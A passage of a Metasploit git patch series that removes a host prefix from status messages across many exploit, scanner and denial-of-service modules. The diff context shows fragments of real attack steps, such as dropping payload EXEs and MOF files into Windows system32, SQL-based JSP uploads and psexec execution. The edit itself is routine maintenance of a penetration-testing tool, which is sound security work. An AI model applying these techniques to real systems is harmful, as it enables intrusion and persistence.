Msf::Exploit::Remote if res && res.code == 200 && res.get_cookies =~ /JSESSIONID=(\w+);/ jsessionid = $1 - print_status("#{peer} - JSESSION ID Retrieved [ #{jsessionid} ]") + print_status("JSESSION ID Retrieved [ #{jsessionid} ]") else fail_with(Failure::Unknown, "#{peer} - Unable to retrieve JSESSION ID!") end - print_status("#{peer} - Access login page") + print_status("Access login page") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, 'event', "j_security_check;jsessionid=#{jsessionid}"), @@ -143,14 +143,14 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 302 redirect = URI(res.headers['Location']) - print_status("#{peer} - Location is [ #{redirect} ]") + print_status("Location is [ #{redirect} ]") else fail_with(Failure::Unknown, "#{peer} - Access to login page failed!") end # Follow redirection process - print_status("#{peer} - Following redirection") + print_status("Following redirection") res = send_request_cgi({ 'uri' => "#{redirect}", 'method' => 'GET' @@ -158,7 +158,7 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 200 && res.get_cookies =~ /JSESSIONID/ cookies = res.get_cookies - print_status("#{peer} - Logged in, new cookies retrieved [#{cookies}]") + print_status("Logged in, new cookies retrieved [#{cookies}]") else fail_with(Failure::Unknown, "#{peer} - Redirect failed, unable to login with provided credentials!") end @@ -170,7 +170,7 @@ class Metasploit3 < Msf::Exploit::Remote jsp_payload = Rex::Text.encode_base64(generate_jsp_payload(cmd)).gsub(/\n/, '') - print_status("#{peer} - Executing SQL queries") + print_status("Executing SQL queries") # Remove large object in database, just in case it exists from previous exploit attempts sql = 'SELECT lo_unlink(-1)' @@ -203,7 +203,7 @@ class Metasploit3 < Msf::Exploit::Remote register_file_for_cleanup("..\\webapps\\event\\#{jsp_name}") - print_status("#{peer} - Executing JSP payload") + print_status("Executing JSP payload") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, jsp_name), diff --git a/modules/exploits/windows/misc/ms10_104_sharepoint.rb b/modules/exploits/windows/misc/ms10_104_sharepoint.rb index 5c46c811ed..c61e866b07 100644 --- a/modules/exploits/windows/misc/ms10_104_sharepoint.rb +++ b/modules/exploits/windows/misc/ms10_104_sharepoint.rb @@ -107,7 +107,7 @@ class Metasploit3 < Msf::Exploit::Remote filename = rand_text_alpha(rand(10)+5) + '.txt' contents = rand_text_alpha(rand(10)+5) - print_status("#{peer} - Sending HTTP ConvertFile Request to upload the test file #{filename}") + print_status("Sending HTTP ConvertFile Request to upload the test file #{filename}") res = upload_file(filename, contents) if res and res.code == 200 and res.body =~ /ConvertFileResponse/ and res.body =~ /<m_ce>CE_OTHER<\/m_ce>/ @@ -127,21 +127,21 @@ class Metasploit3 < Msf::Exploit::Remote mof_name = rand_text_alpha(rand(10)+5) + '.mof' mof = generate_mof(mof_name, exe_name) - print_status("#{peer} - Sending HTTP ConvertFile Request to upload the exe payload #{exe_name}") + print_status("Sending HTTP ConvertFile Request to upload the exe payload #{exe_name}") res = upload_file("WINDOWS\\system32\\#{exe_name}", exe) if res and res.code == 200 and res.body =~ /ConvertFileResponse/ and res.body =~ /<m_ce>CE_OTHER<\/m_ce>/ - print_good("#{peer} - #{exe_name} uploaded successfully") + print_good("#{exe_name} uploaded successfully") else - print_error("#{peer} - Failed to upload #{exe_name}") + print_error("Failed to upload #{exe_name}") return end - print_status("#{peer} - Sending HTTP ConvertFile Request to upload the mof file #{mof_name}") + print_status("Sending HTTP ConvertFile Request to upload the mof file #{mof_name}") res = upload_file("WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof) if res and res.code == 200 and res.body =~ /ConvertFileResponse/ and res.body =~ /<m_ce>CE_OTHER<\/m_ce>/ - print_good("#{peer} - #{mof_name} uploaded successfully") + print_good("#{mof_name} uploaded successfully") else - print_error("#{peer} - Failed to upload #{mof_name}") + print_error("Failed to upload #{mof_name}") return end diff --git a/modules/exploits/windows/misc/sap_netweaver_dispatcher.rb b/modules/exploits/windows/misc/sap_netweaver_dispatcher.rb index 9641fcacc5..0b08956557 100644 --- a/modules/exploits/windows/misc/sap_netweaver_dispatcher.rb +++ b/modules/exploits/windows/misc/sap_netweaver_dispatcher.rb @@ -136,12 +136,12 @@ class Metasploit3 < Msf::Exploit::Remote pkt << diagheader pkt << user_connect pkt << support_data - print_status("#{peer} - Sending initialize packet to the SAP Dispatcher") + print_status("Sending initialize packet to the SAP Dispatcher") sock.put(pkt) res = sock.get_once(-1) if not res - print_error("#{peer} - The connection with the Dispatcher has not been initialized") + print_error("The connection with the Dispatcher has not been initialized") return end @@ -162,7 +162,7 @@ class Metasploit3 < Msf::Exploit::Remote crash << payload.encoded end - print_status("#{peer} - Sending crafted message") + print_status("Sending crafted message") message = "\x10\x06\x20" + [crash.length].pack("n") + crash diagheader = "\x00\x00\x00\x00\x00\x00\x00\x00" step = "\x10\x04\x26\x00\x04\x00\x00\x00\x01" diff --git a/modules/exploits/windows/misc/solidworks_workgroup_pdmwservice_file_write.rb b/modules/exploits/windows/misc/solidworks_workgroup_pdmwservice_file_write.rb index b2a11ea670..c929b1db48 100644 --- a/modules/exploits/windows/misc/solidworks_workgroup_pdmwservice_file_write.rb +++ b/modules/exploits/windows/misc/solidworks_workgroup_pdmwservice_file_write.rb @@ -81,13 +81,13 @@ class Metasploit3 < Msf::Exploit::Remote res = sock.get_once disconnect if !res - vprint_error "#{peer} - Connection failed." + vprint_error "Connection failed." Exploit::CheckCode::Unknown elsif res == "\x00\x00\x00\x00" - vprint_status "#{peer} - Received reply (#{res.length} bytes)" + vprint_status "Received reply (#{res.length} bytes)" Exploit::CheckCode::Detected else - vprint_warning "#{peer} - Unexpected reply (#{res.length} bytes)" + vprint_warning "Unexpected reply (#{res.length} bytes)" Exploit::CheckCode::Safe end end @@ -115,9 +115,9 @@ class Metasploit3 < Msf::Exploit::Remote if !res fail_with(Failure::Unknown, "#{peer} - Connection failed.") elsif res == "\x00\x00\x00\x00" - print_status "#{peer} - Received reply (#{res.length} bytes)" + print_status "Received reply (#{res.length} bytes)" else - print_warning "#{peer} - Unexpected reply (#{res.length} bytes)" + print_warning "Unexpected reply (#{res.length} bytes)" end end @@ -129,15 +129,15 @@ class Metasploit3 < Msf::Exploit::Remote exe = generate_payload_exe exe_name = "#{rand_text_alpha(rand(10) + 5)}.exe" if target.name =~ /Automatic/ or target.name =~ /Vista/ - print_status("#{peer} - Writing EXE to startup for all users (#{exe.length} bytes)") + print_status("Writing EXE to startup for all users (#{exe.length} bytes)") upload("#{depth}\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\#{exe_name}", exe) end if target.name =~ /Automatic/ or target.name =~ /XP/ - print_status("#{peer} - Sending EXE (#{exe.length} bytes)") + print_status("Sending EXE (#{exe.length} bytes)") upload("#{depth}\\WINDOWS\\system32\\#{exe_name}", exe) mof_name = "#{rand_text_alpha(rand(10) + 5)}.mof" mof = generate_mof(::File.basename(mof_name), ::File.basename(exe_name)) - print_status("#{peer} - Sending MOF (#{mof.length} bytes)") + print_status("Sending MOF (#{mof.length} bytes)") upload("#{depth}\\WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof) register_file_for_cleanup("wbem\\mof\\good\\#{::File.basename(mof_name)}") end diff --git a/modules/exploits/windows/mysql/mysql_mof.rb b/modules/exploits/windows/mysql/mysql_mof.rb index f0147cad1f..9c292c9619 100644 --- a/modules/exploits/windows/mysql/mysql_mof.rb +++ b/modules/exploits/windows/mysql/mysql_mof.rb @@ -92,17 +92,17 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Attempting to login as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'") + print_status("Attempting to login as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'") begin m = mysql_login(datastore['USERNAME'], datastore['PASSWORD']) return if not m rescue RbMysql::AccessDeniedError - print_error("#{peer} - Access denied.") + print_error("Access denied.") return end if not is_windows? - print_error("#{peer} - Remote host isn't Windows.") + print_error("Remote host isn't Windows.") return end @@ -110,24 +110,24 @@ class Metasploit3 < Msf::Exploit::Remote exe_name = Rex::Text::rand_text_alpha(5) + ".exe" dest = "#{drive}:/windows/system32/#{exe_name}" exe = generate_payload_exe - print_status("#{peer} - Uploading to '#{dest}'") + print_status("Uploading to '#{dest}'") begin upload_file(exe, dest) register_file_for_cleanup("#{exe_name}") rescue RbMysql::AccessDeniedError - print_error("#{peer} - No permission to write. I blame kc :-)") + print_error("No permission to write. I blame kc :-)") return end mof_name = Rex::Text::rand_text_alpha(5) + ".mof" dest = "#{drive}:/windows/system32/wbem/mof/#{mof_name}" mof = generate_mof(mof_name, exe_name) - print_status("#{peer} - Uploading to '#{dest}'") + print_status("Uploading to '#{dest}'") begin upload_file(mof, dest) register_file_for_cleanup("wbem\\mof\\good\\#{mof_name}") rescue RbMysql::AccessDeniedError - print_error("#{peer} - No permission to write. Bail!") + print_error("No permission to write. Bail!") return end end diff --git a/modules/exploits/windows/mysql/mysql_start_up.rb b/modules/exploits/windows/mysql/mysql_start_up.rb index 29a09fcac5..5628daeca3 100644 --- a/modules/exploits/windows/mysql/mysql_start_up.rb +++ b/modules/exploits/windows/mysql/mysql_start_up.rb @@ -102,7 +102,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::BadConfig, "STARTUP_FOLDER should start and end with '/' Ex: /programdata/microsoft/windows/start menu/programs/startup/") end - print_status("#{peer} - Attempting to login as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'") + print_status("Attempting to login as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'") begin m = mysql_login(datastore['USERNAME'], datastore['PASSWORD']) rescue RbMysql::AccessDeniedError @@ -127,7 +127,7 @@ class Metasploit3 < Msf::Exploit::Remote dest = "#{drive}:#{datastore['STARTUP_FOLDER']}#{exe_name}" exe = generate_payload_exe - print_status("#{peer} - Uploading to '#{dest}'") + print_status("Uploading to '#{dest}'") begin upload_file(exe, dest) rescue RbMysql::AccessDeniedError diff --git a/modules/exploits/windows/novell/file_reporter_fsfui_upload.rb b/modules/exploits/windows/novell/file_reporter_fsfui_upload.rb index fd2883bd84..79b9157845 100644 --- a/modules/exploits/windows/novell/file_reporter_fsfui_upload.rb +++ b/modules/exploits/windows/novell/file_reporter_fsfui_upload.rb @@ -104,13 +104,13 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Generating VBS file...") mof_content = generate_mof("#{@var_mof_name}.mof", "#{@var_vbs_name}.vbs") - print_status("#{peer} - Uploading the VBS file") + print_status("Uploading the VBS file") worked = upload_file("WINDOWS\\system32\\#{@var_vbs_name}.vbs", vbs_content) unless worked fail_with(Failure::NotVulnerable, "Failed to upload the file") end - print_status("#{peer} - Uploading the MOF file") + print_status("Uploading the MOF file") upload_file("WINDOWS\\system32\\wbem\\mof\\#{@var_mof_name}.mof", mof_content) end @@ -132,9 +132,9 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 and res.body.include? "<RESULT><VERSION>1</VERSION><STATUS>0</STATUS></RESULT>" - print_warning("#{peer} - File successfully uploaded: #{filename}") + print_warning("File successfully uploaded: #{filename}") else - print_error("#{peer} - Failed to upload the file") + print_error("Failed to upload the file") return false end diff --git a/modules/exploits/windows/scada/ge_proficy_cimplicity_gefebt.rb b/modules/exploits/windows/scada/ge_proficy_cimplicity_gefebt.rb index 5b423dfa65..451686637c 100644 --- a/modules/exploits/windows/scada/ge_proficy_cimplicity_gefebt.rb +++ b/modules/exploits/windows/scada/ge_proficy_cimplicity_gefebt.rb @@ -270,7 +270,7 @@ End Sub end def execute_bcl(i) - print_status("#{peer} - Executing BCL code #{@basename}#{i}.bcl to drop final payload...") + print_status("Executing BCL code #{@basename}#{i}.bcl to drop final payload...") uri = normalize_uri(target_uri.to_s, "CimWeb", "gefebt.exe") uri << "?#{@exploit_unc}#{@share_name}\\#{@basename}#{i}.bcl" @@ -280,12 +280,12 @@ End Sub # We use res.to_s because the embedded CIMPLICITY Web server doesn't # answer with valid HTTP responses. if res and res.code == 200 and res.to_s =~ /(^Error.*$)/ - print_error("#{peer} - Server answered with error: $1") + print_error("Server answered with error: $1") fail_with(Failure::Unknown, "#{peer} - Server answered with error") elsif res and res.code == 200 and res.to_s =~ /No such file or directory/ fail_with(Failure::BadConfig, "#{peer} - The target wasn't able to access the remote BCL file") elsif res and res.code == 200 - print_good("#{peer} - '200 OK' answer indicates success!") + print_good("'200 OK' answer indicates success!") else fail_with(Failure::Unknown, "#{peer} - Unknown error") end @@ -296,7 +296,7 @@ End Sub execute_bcl(i) end - print_status("#{peer} - Executing #{@exe_filename}...") + print_status("Executing #{@exe_filename}...") uri = normalize_uri(target_uri.to_s, "CimWeb", @exe_filename) uri << "?" diff --git a/modules/exploits/windows/smb/psexec.rb b/modules/exploits/windows/smb/psexec.rb index 362dd6e87d..7b7c816897 100644 --- a/modules/exploits/windows/smb/psexec.rb +++ b/modules/exploits/windows/smb/psexec.rb @@ -171,7 +171,7 @@ class Metasploit3 < Msf::Exploit::Remote end # Execute the powershell command - print_status("#{peer} - Executing the payload...") + print_status("Executing the payload...") begin psexec(command) rescue StandardError => exec_command_error diff --git a/modules/exploits/windows/smb/psexec_psh.rb b/modules/exploits/windows/smb/psexec_psh.rb index 0c45d00c83..17727557a0 100644 --- a/modules/exploits/windows/smb/psexec_psh.rb +++ b/modules/exploits/windows/smb/psexec_psh.rb @@ -90,7 +90,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NoAccess, "#{peer} - Unable to authenticate with given credentials: #{autherror}") end # Execute the powershell command - print_status("#{peer} - Executing the payload...") + print_status("Executing the payload...") begin return psexec(command) rescue StandardError => exec_command_error From 8094eb631b93e80dc68a94d6cd5deb220a4c25aa Mon Sep 17 00:00:00 2001 From: James Lee <egypt@metasploit.com> Date: Mon, 1 Feb 2016 16:06:34 -0600 Subject: [PATCH 33/71] Do the same for aux modules --- .../admin/hp/hp_imc_som_create_account.rb | 22 +++---- .../admin/http/axigen_file_access.rb | 28 ++++----- .../auxiliary/admin/http/iis_auth_bypass.rb | 6 +- .../admin/http/intersil_pass_reset.rb | 20 +++--- .../auxiliary/admin/http/jboss_bshdeployer.rb | 26 ++++---- .../http/jboss_deploymentfilerepository.rb | 26 ++++---- .../admin/http/kaseya_master_admin.rb | 8 +-- .../http/linksys_tmunblock_admin_reset_bof.rb | 22 +++---- .../http/manage_engine_dc_create_admin.rb | 4 +- .../admin/http/manageengine_dir_listing.rb | 14 ++--- .../admin/http/manageengine_file_download.rb | 16 ++--- .../admin/http/manageengine_pmp_privesc.rb | 14 ++--- .../admin/http/mutiny_frontend_read_delete.rb | 24 +++---- .../admin/http/netflow_file_download.rb | 10 +-- .../http/netgear_soap_password_extractor.rb | 20 +++--- .../http/novell_file_reporter_filedelete.rb | 6 +- .../admin/http/sophos_wpa_traversal.rb | 12 ++-- .../auxiliary/admin/http/sysaid_admin_acct.rb | 4 +- .../admin/http/sysaid_file_download.rb | 8 +-- .../auxiliary/admin/http/sysaid_sql_creds.rb | 2 +- .../admin/http/vbulletin_upgrade_admin.rb | 8 +-- .../admin/http/wp_custom_contact_forms.rb | 12 ++-- .../http/wp_easycart_privilege_escalation.rb | 26 ++++---- .../http/wp_wplms_privilege_escalation.rb | 20 +++--- .../admin/misc/sercomm_dump_config.rb | 22 +++---- .../mssql/mssql_enum_domain_accounts_sqli.rb | 28 ++++----- .../mssql/mssql_escalate_dbowner_sqli.rb | 32 +++++----- .../mssql/mssql_escalate_execute_as_sqli.rb | 36 +++++------ .../advantech_webaccess_dbvisitor_sqli.rb | 10 +-- modules/auxiliary/admin/smb/psexec_command.rb | 24 +++---- .../auxiliary/admin/smb/psexec_ntdsgrab.rb | 48 +++++++------- .../admin/webmin/edit_html_fileaccess.rb | 14 ++--- .../dos/http/apache_commons_fileupload_dos.rb | 2 +- .../dos/http/f5_bigip_apm_max_sessions.rb | 22 +++---- .../dos/http/ms15_034_ulonglongadd.rb | 10 +-- .../dos/http/novell_file_reporter_heap_bof.rb | 8 +-- .../dos/http/rails_json_float_dos.rb | 16 ++--- .../dos/http/wordpress_long_password_dos.rb | 16 ++--- .../dos/http/wordpress_xmlrpc_dos.rb | 18 +++--- .../dos/misc/ibm_sametime_webplayer_dos.rb | 48 +++++++------- .../gather/alienvault_iso27001_sqli.rb | 16 ++--- .../gather/alienvault_newpolicyform_sqli.rb | 20 +++--- .../auxiliary/gather/coldfusion_pwd_props.rb | 12 ++-- .../gather/doliwamp_traversal_creds.rb | 34 +++++----- modules/auxiliary/gather/drupal_openid_xxe.rb | 14 ++--- modules/auxiliary/gather/eaton_nsm_creds.rb | 8 +-- .../gather/f5_bigip_cookie_disclosure.rb | 18 +++--- .../auxiliary/gather/hp_snac_domain_creds.rb | 12 ++-- modules/auxiliary/gather/huawei_wifi_info.rb | 18 +++--- .../gather/ibm_sametime_enumerate_users.rb | 38 ++++++------ .../gather/ibm_sametime_room_brute.rb | 14 ++--- .../auxiliary/gather/ibm_sametime_version.rb | 10 +-- modules/auxiliary/gather/java_rmi_registry.rb | 20 +++--- .../gather/konica_minolta_pwd_extract.rb | 10 +-- .../auxiliary/gather/memcached_extractor.rb | 12 ++-- .../auxiliary/gather/mybb_db_fingerprint.rb | 16 ++--- .../auxiliary/gather/vbulletin_vote_sqli.rb | 16 ++--- .../gather/wp_all_in_one_migration_export.rb | 4 +- .../wp_ultimate_csv_importer_user_extract.rb | 8 +-- .../gather/xerox_workcentre_5xxx_ldap.rb | 32 +++++----- .../auxiliary/scanner/couchdb/couchdb_enum.rb | 6 +- .../scanner/elasticsearch/indices_enum.rb | 10 +-- .../a10networks_ax_directory_traversal.rb | 10 +-- .../scanner/http/apache_mod_cgi_bash_env.rb | 2 +- .../http/bitweaver_overlay_type_traversal.rb | 12 ++-- .../auxiliary/scanner/http/cisco_asa_asdm.rb | 18 +++--- .../auxiliary/scanner/http/cisco_ssl_vpn.rb | 26 ++++---- .../scanner/http/cisco_ssl_vpn_priv_esc.rb | 32 +++++----- .../scanner/http/clansphere_traversal.rb | 8 +-- .../auxiliary/scanner/http/dolibarr_login.rb | 16 ++--- .../scanner/http/drupal_views_user_enum.rb | 4 +- .../scanner/http/elasticsearch_traversal.rb | 10 +-- .../scanner/http/etherpad_duo_login.rb | 16 ++--- .../auxiliary/scanner/http/f5_mgmt_scanner.rb | 16 ++--- .../auxiliary/scanner/http/gitlab_login.rb | 4 +- .../scanner/http/goahead_traversal.rb | 4 +- .../scanner/http/hp_imc_som_file_download.rb | 8 +-- ...hp_sitescope_getfileinternal_fileaccess.rb | 20 +++--- .../hp_sitescope_getsitescopeconfiguration.rb | 18 +++--- ...hp_sitescope_loadfilecontent_fileaccess.rb | 12 ++-- .../scanner/http/hp_sys_mgmt_login.rb | 8 +-- .../auxiliary/scanner/http/influxdb_enum.rb | 16 ++--- .../auxiliary/scanner/http/jenkins_enum.rb | 24 +++---- .../http/joomla_ecommercewd_sqli_scanner.rb | 4 +- .../http/joomla_gallerywd_sqli_scanner.rb | 6 +- .../auxiliary/scanner/http/joomla_pages.rb | 10 +-- .../auxiliary/scanner/http/joomla_plugins.rb | 20 +++--- .../manageengine_deviceexpert_user_creds.rb | 14 ++--- .../manageengine_securitymanager_traversal.rb | 8 +-- .../http/ms15_034_http_sys_memory_dump.rb | 6 +- .../scanner/http/netgear_sph200d_traversal.rb | 14 ++--- .../novell_file_reporter_fsfui_fileaccess.rb | 6 +- .../novell_file_reporter_srs_fileaccess.rb | 6 +- .../scanner/http/ntlm_info_enumeration.rb | 6 +- .../scanner/http/openmind_messageos_login.rb | 16 ++--- ...acle_demantra_database_credentials_leak.rb | 8 +-- .../scanner/http/oracle_ilom_login.rb | 16 ++--- .../auxiliary/scanner/http/pocketpad_login.rb | 16 ++--- .../scanner/http/radware_appdirector_enum.rb | 16 ++--- .../auxiliary/scanner/http/rips_traversal.rb | 4 +- .../auxiliary/scanner/http/s40_traversal.rb | 10 +-- .../http/servicedesk_plus_traversal.rb | 10 +-- .../scanner/http/smt_ipmi_49152_exposure.rb | 8 +-- .../scanner/http/smt_ipmi_cgi_scanner.rb | 14 ++--- .../http/smt_ipmi_url_redirect_traversal.rb | 18 +++--- ...support_center_plus_directory_traversal.rb | 28 ++++----- .../http/symantec_brightmail_logfile.rb | 12 ++-- .../scanner/http/typo3_bruteforce.rb | 8 +-- modules/auxiliary/scanner/http/vcms_login.rb | 10 +-- .../scanner/http/wildfly_traversal.rb | 6 +- .../http/wordpress_cp_calendar_sqli.rb | 6 +- .../scanner/http/wordpress_ghost_scanner.rb | 8 +-- .../scanner/http/wordpress_xmlrpc_login.rb | 2 +- .../http/wp_contus_video_gallery_sqli.rb | 6 +- .../scanner/http/wp_dukapress_file_read.rb | 4 +- .../http/wp_gimedia_library_file_read.rb | 4 +- .../http/wp_mobile_pack_info_disclosure.rb | 6 +- .../http/wp_mobileedition_file_read.rb | 4 +- .../http/wp_nextgen_galley_file_read.rb | 16 ++--- .../http/wp_simple_backup_file_read.rb | 6 +- .../http/wp_subscribe_comments_file_read.rb | 20 +++--- .../auxiliary/scanner/misc/java_rmi_server.rb | 8 +-- .../scanner/misc/sunrpc_portmapper.rb | 4 +- .../scanner/mysql/mysql_file_enum.rb | 22 +++---- .../auxiliary/scanner/redis/redis_server.rb | 6 +- .../auxiliary/scanner/rsync/modules_list.rb | 20 +++--- .../scanner/sap/sap_mgmt_con_brute_login.rb | 2 +- .../scanner/smb/psexec_loggedin_users.rb | 28 ++++----- .../auxiliary/scanner/smb/smb_uninit_cred.rb | 8 +-- modules/auxiliary/scanner/smtp/smtp_relay.rb | 24 +++---- modules/auxiliary/scanner/ssl/openssl_ccs.rb | 14 ++--- .../scanner/ssl/openssl_heartbleed.rb | 62 +++++++++---------- .../voip/cisco_cucdm_call_forward.rb | 14 ++--- .../auxiliary/voip/cisco_cucdm_speed_dials.rb | 36 +++++------ 134 files changed, 987 insertions(+), 987 deletions(-) diff --git a/modules/auxiliary/admin/hp/hp_imc_som_create_account.rb b/modules/auxiliary/admin/hp/hp_imc_som_create_account.rb index 1941291594..3f21a39c33 100644 --- a/modules/auxiliary/admin/hp/hp_imc_som_create_account.rb +++ b/modules/auxiliary/admin/hp/hp_imc_som_create_account.rb @@ -99,21 +99,21 @@ class Metasploit3 < Msf::Auxiliary def run - print_status("#{peer} - Trying to find the service desk service strong name...") + print_status("Trying to find the service desk service strong name...") service_desk = get_service_desk_strong_name if service_desk.nil? - print_error("#{peer} - service desk service not found.") + print_error("service desk service not found.") return end - print_good("#{peer} - service desk strong number found: #{service_desk}") + print_good("service desk strong number found: #{service_desk}") - print_status("#{peer} - Trying to find the AccountService strong name...") + print_status("Trying to find the AccountService strong name...") account_service = get_account_service_strong_name(service_desk) if account_service.nil? - print_error("#{peer} - AccountService service not found.") + print_error("AccountService service not found.") return end - print_good("#{peer} - AccountService strong number found: #{account_service}") + print_good("AccountService strong number found: #{account_service}") header= "6|0|39" # version | unknown | string_table size @@ -234,7 +234,7 @@ class Metasploit3 < Msf::Auxiliary service_url = ssl ? "https://" : "http://" service_url << "#{rhost}:#{rport}/servicedesk/servicedesk/" - print_status("#{peer} - Trying to create account #{datastore["USERNAME"]}...") + print_status("Trying to create account #{datastore["USERNAME"]}...") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri("servicedesk", "servicedesk", "accountSerivce.gwtsvc"), @@ -247,12 +247,12 @@ class Metasploit3 < Msf::Auxiliary }) unless res and res.code == 200 - print_error("#{peer} - Unknown error while creating the user.") + print_error("Unknown error while creating the user.") return end if res.body =~ /Username.*already exists/ - print_error("#{peer} - The user #{datastore["USERNAME"]} already exists.") + print_error("The user #{datastore["USERNAME"]} already exists.") return elsif res.body =~ /Account.*added successfully/ login_url = ssl ? "https://" : "http://" @@ -267,8 +267,8 @@ class Metasploit3 < Msf::Auxiliary proof: "#{login_url}\n#{res.body}" ) - print_good("#{peer} - Account #{datastore["USERNAME"]}/#{datastore["PASSWORD"]} created successfully.") - print_status("#{peer} - Use it to log into #{login_url}") + print_good("Account #{datastore["USERNAME"]}/#{datastore["PASSWORD"]} created successfully.") + print_status("Use it to log into #{login_url}") end end diff --git a/modules/auxiliary/admin/http/axigen_file_access.rb b/modules/auxiliary/admin/http/axigen_file_access.rb index 7b4925a4ca..6e6a7939a0 100644 --- a/modules/auxiliary/admin/http/axigen_file_access.rb +++ b/modules/auxiliary/admin/http/axigen_file_access.rb @@ -51,11 +51,11 @@ class Metasploit3 < Msf::Auxiliary end def run - print_status("#{peer} - Trying to login") + print_status("Trying to login") if login - print_good("#{peer} - Login successful") + print_good("Login successful") else - print_error("#{peer} - Login failed, review USERNAME and PASSWORD options") + print_error("Login failed, review USERNAME and PASSWORD options") return end @@ -67,7 +67,7 @@ class Metasploit3 < Msf::Auxiliary @traversal.gsub!(/\//, "\\") file.gsub!(/\//, "\\") else # unix - print_error("#{peer} - *nix platform detected, vulnerability is only known to work on Windows") + print_error("*nix platform detected, vulnerability is only known to work on Windows") return end @@ -81,7 +81,7 @@ class Metasploit3 < Msf::Auxiliary def read_file(file) - print_status("#{peer} - Retrieving file contents...") + print_status("Retrieving file contents...") res = send_request_cgi( { @@ -96,14 +96,14 @@ class Metasploit3 < Msf::Auxiliary if res and res.code == 200 and res.headers['Content-Type'] and res.body.length > 0 store_path = store_loot("axigen.webadmin.data", "application/octet-stream", rhost, res.body, file) - print_good("#{peer} - File successfully retrieved and saved on #{store_path}") + print_good("File successfully retrieved and saved on #{store_path}") else - print_error("#{peer} - Failed to retrieve file") + print_error("Failed to retrieve file") end end def delete_file(file) - print_status("#{peer} - Deleting file #{file}") + print_status("Deleting file #{file}") res = send_request_cgi( { @@ -119,14 +119,14 @@ class Metasploit3 < Msf::Auxiliary }) if res and res.code == 200 and res.body =~ /View Log Files/ - print_good("#{peer} - File #{file} deleted") + print_good("File #{file} deleted") else - print_error("#{peer} - Error deleting file #{file}") + print_error("Error deleting file #{file}") end end def get_platform - print_status("#{peer} - Retrieving platform") + print_status("Retrieving platform") res = send_request_cgi( { @@ -140,15 +140,15 @@ class Metasploit3 < Msf::Auxiliary if res and res.code == 200 if res.body =~ /Windows/ - print_good("#{peer} - Windows platform found") + print_good("Windows platform found") return 'windows' elsif res.body =~ /Linux/ - print_good("#{peer} - Linux platform found") + print_good("Linux platform found") return 'unix' end end - print_warning("#{peer} - Platform not found, assuming UNIX flavor") + print_warning("Platform not found, assuming UNIX flavor") return 'unix' end diff --git a/modules/auxiliary/admin/http/iis_auth_bypass.rb b/modules/auxiliary/admin/http/iis_auth_bypass.rb index 4601c36955..0d999c859a 100644 --- a/modules/auxiliary/admin/http/iis_auth_bypass.rb +++ b/modules/auxiliary/admin/http/iis_auth_bypass.rb @@ -77,16 +77,16 @@ class Metasploit3 < Msf::Auxiliary def run if not has_auth - print_error("#{peer} - No basic authentication enabled") + print_error("No basic authentication enabled") return end bypass_string = try_auth if bypass_string.empty? - print_error("#{peer} - The bypass attempt did not work") + print_error("The bypass attempt did not work") else - print_good("#{peer} - You can bypass auth by doing: #{bypass_string}") + print_good("You can bypass auth by doing: #{bypass_string}") end end diff --git a/modules/auxiliary/admin/http/intersil_pass_reset.rb b/modules/auxiliary/admin/http/intersil_pass_reset.rb index 335c0e050d..036a3ee2cc 100644 --- a/modules/auxiliary/admin/http/intersil_pass_reset.rb +++ b/modules/auxiliary/admin/http/intersil_pass_reset.rb @@ -52,17 +52,17 @@ class Metasploit3 < Msf::Auxiliary }) if (res and (m = res.headers['Server'].match(/Boa\/(.*)/))) - vprint_status("#{peer} - Boa Version Detected: #{m[1]}") + vprint_status("Boa Version Detected: #{m[1]}") return Exploit::CheckCode::Safe if (m[1][0].ord-48>0) # boa server wrong version return Exploit::CheckCode::Safe if (m[1][3].ord-48>4) return Exploit::CheckCode::Vulnerable else - vprint_status("#{peer} - Not a Boa Server!") + vprint_status("Not a Boa Server!") return Exploit::CheckCode::Safe # not a boa server end rescue Rex::ConnectionRefused - print_error("#{peer} - Connection refused by server.") + print_error("Connection refused by server.") return Exploit::CheckCode::Safe end end @@ -80,14 +80,14 @@ class Metasploit3 < Msf::Auxiliary }) if res.nil? - print_error("#{peer} - The server may be down") + print_error("The server may be down") return elsif res and res.code != 401 - print_status("#{peer} - #{uri} does not have basic authentication enabled") + print_status("#{uri} does not have basic authentication enabled") return end - print_status("#{peer} - Server still operational. Checking to see if password has been overwritten") + print_status("Server still operational. Checking to see if password has been overwritten") res = send_request_cgi({ 'uri' => uri, 'method'=> 'GET', @@ -95,17 +95,17 @@ class Metasploit3 < Msf::Auxiliary }) if not res - print_error("#{peer} - Server timedout, will not continue") + print_error("Server timedout, will not continue") return end case res.code when 200 - print_good("#{peer} - Password reset successful with admin:#{datastore['PASSWORD']}") + print_good("Password reset successful with admin:#{datastore['PASSWORD']}") when 401 - print_error("#{peer} - Access forbidden. The password reset attempt did not work") + print_error("Access forbidden. The password reset attempt did not work") else - print_status("#{peer} - Unexpected response: Code #{res.code} encountered") + print_status("Unexpected response: Code #{res.code} encountered") end end diff --git a/modules/auxiliary/admin/http/jboss_bshdeployer.rb b/modules/auxiliary/admin/http/jboss_bshdeployer.rb index 63883fbf56..1e1d9dbf8d 100644 --- a/modules/auxiliary/admin/http/jboss_bshdeployer.rb +++ b/modules/auxiliary/admin/http/jboss_bshdeployer.rb @@ -49,13 +49,13 @@ class Metasploit3 < Msf::Auxiliary encoded_payload = Rex::Text.encode_base64(war_data).gsub(/\n/, '') if http_verb == 'POST' - print_status("#{peer} - Deploying payload...") + print_status("Deploying payload...") opts = { :file => "#{app_base}.war", :contents => encoded_payload } else - print_status("#{peer} - Deploying stager...") + print_status("Deploying stager...") stager_name = Rex::Text.rand_text_alpha(8 + 